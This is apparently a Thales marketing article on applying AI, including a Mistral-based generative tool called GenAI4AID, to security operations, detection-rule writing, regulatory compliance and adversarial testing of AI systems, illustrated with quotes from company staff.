AI FOR CYBER: FASTER, EASIER & BETTER
In recent years, Artificial Intelligence (AI) has woven its way into the cybersecurity value chain. Today, everyone is talking about it. Expectations are high. Yet, it isn’t always easy to know exactly how AI can make cybersecurity systems more efficient and robust. Do the benefits outweigh the risks? How do you ensure your AI products comply with regulations?
Let’s dive a little deeper to explore the challenges and opportunities with some of our AI cybersecurity experts.
AI comes in many shapes and forms : Machine Learning, AI Analytics, Generative AI
Advances in AI are already making significant contributions to cybersecurity across a wide range of applications, from enhancing cyber detection to improving cyber protection. AI-powered algorithms and machine learning techniques are revolutionizing the way we identify and mitigate cyber threats. With the ability to analyze vast amounts of data in real-time, AI enhances the speed and accuracy of threat detection, enabling security systems to identify and respond to threats more effectively. AI algorithms can learn from historical data and patterns, continuously improving their ability to detect and prevent sophisticated cyber-attacks.
What’s more, AI is enabling us to automate routine tasks, freeing up security analysts to focus on more complex threat hunting and incident response activities. By leveraging the power of AI, organizations are able to strengthen their cyber defenses and stay one step ahead of evolving threats. For example, AI can be used to create detection rules to enhance time to answer for cyber intrusions or alert customers about cyber threats. Not to mention help systems recover after an attack.
“In our Security Operations Centers (SOC), AI has the potential to speed things up, improve our understanding and even train collaborators – at a moment when the industry is experiencing a serious lack of cybersecurity talent. Of course, we need to make sure the tech is mature enough by carrying out extensive studies and testing. AI is helping on a first level basis,” highlights Paul Chauchis, SOC & Infrastructure Architect, Thales.
Putting GenAI into Action at Thales
Building tools based on a French-owned model (Mistral AI), the Thales teams have added their own expertise to develop a dedicated Thales solution based on generative AI : GenAI4AID and some specific use cases to enhance our Managed Security Services in cyber security. These include automating SOC build to speed up build efforts, investigating threats to improve qualification and optimising emergency response. GenAI4AID has already been used by some of our clients to help our cyber and data engineers enhance intrusion detection. It automates rule management, making it easier to produce and test rules.
"GenAI allows us to define and implement detection rules more quickly, which we use to identify suspicious behaviors and vulnerabilities. For instance, one of our use cases based on generative AI involves designing detection rules that simplify the verification process by providing textual explanations of the identified risk," explains Adrien Becue, AI & Cyber Security Expert at Thales.
By incorporating AI algorithms and machine learning models into our SOC workflows, we can effectively analyze and correlate vast amounts of security data in real-time, identifying patterns and anomalies that may indicate a potential attack. Using AI also strengthens our proactive threat hunting capabilities, allowing us to stay ahead of emerging threats and rapidly respond to incidents. Integrating AI within our SOC operations helps us deliver advanced and comprehensive cybersecurity services to our clients, ensuring their critical assets and systems remain protected in today's constantly evolving threat landscape.
As a Managed Security Service Provider (MSSP), we collaborate with leading partners such as Microsoft, IBM, and Google at the forefront of artificial intelligence. We leverage their generative technologies like Copilot or Gemini, as well as the predictive capabilities embedded in their products, to enhance the quality of our managed security services. This enables us to optimize the detection and response to our clients' security incidents.
High Potential and Careful Testing
Many of our customers are already excited about these advances. In a recent survey, 70% felt that AI embedded detection and response solutions guaranteed effectiveness – provided they were carefully tested and the results conclusive.
“There are big expectations in relation to AI, but there is still a gap with the reality on the ground. Many of our customers are looking for the fastest, most efficient and cost-effective solutions. That is exactly what we aim to provide regardless of the technology used – keeping a close eye on the cost-benefit ratio of embedding AI. For governments and global organizations, minimizing risk is also a priority. They need to know that AI-generated results can be trusted for critical decision-making. If we use AI, it therefore needs to be reliable and well trained – which is why our teams are their own most exacting client,” highlights Thierry Hua, Senior Cybersecurity Solution Architect, Thales.
Ensuring AI is Compliant and Robust
AI technology is advancing quickly. It is therefore essential to make sure that AI products are secure, transparent and high quality, especially in the wake of recent laws like the AI Act. To help customers achieve compliance with this EU-wide artificial intelligence framework – as well as other regulations including GDPR, Dora and NIS2 – our cyber compliance and governance consulting teams provide tailored support.
AI products also need to be robust as hackers get better at attacking AI systems. These attacks include poisoning data, evasion and oracle attacks and attempting to steal chatbot training data – as well as many others. We perform adversarial AI attacks on representative target infrastructures to identify vulnerabilities that could affect our customers – making it harder for the real cybercriminals to get in. Managed by our Security and Reliability Evaluation Lab, this AI hacking helps us test the resilience and security of both hardware and software products containing AI – enabling us to lead the way towards the future certification of AI-enabled solutions.
In November 2023, our Friendly Hackers team came out on top in the CAID challenge organized by the French Ministry of Defense – aimed at assessing the attacking teams’ ability to exploit intrinsic vulnerabilities in AI models. This win further demonstrates our technical capabilities to test the security of AI algorithms in order to protect training datasets and intellectual property. By identifying vulnerabilities, relevant countermeasures can be recommended as part of a reinforced security approach.
New applications, Same Exacting Standards
Is AI a miracle solution for cyber? No, but it is already a powerful enabler that can help make cybersecurity systems more effective – provided that the products are carefully tested and regulated. This innovative yet careful approach lies at the heart of our strategy with the aim of providing the most adapted solution for each customer – using AI when it adds proven value and minimal risk.
“If we want to provide innovative, high-performance solutions that can be relied on, we need to take the time to do it right, always focusing on quality, robustness and accuracy. Moving forwards, we will continue to optimize our existing AI use cases while exploring new ones in prevention and protection,” concludes Adrien.
Keen to understand how AI can help reinforce your cybersecurity strategy?
Looking to deploy intrusion detection rules more quickly and efficiently?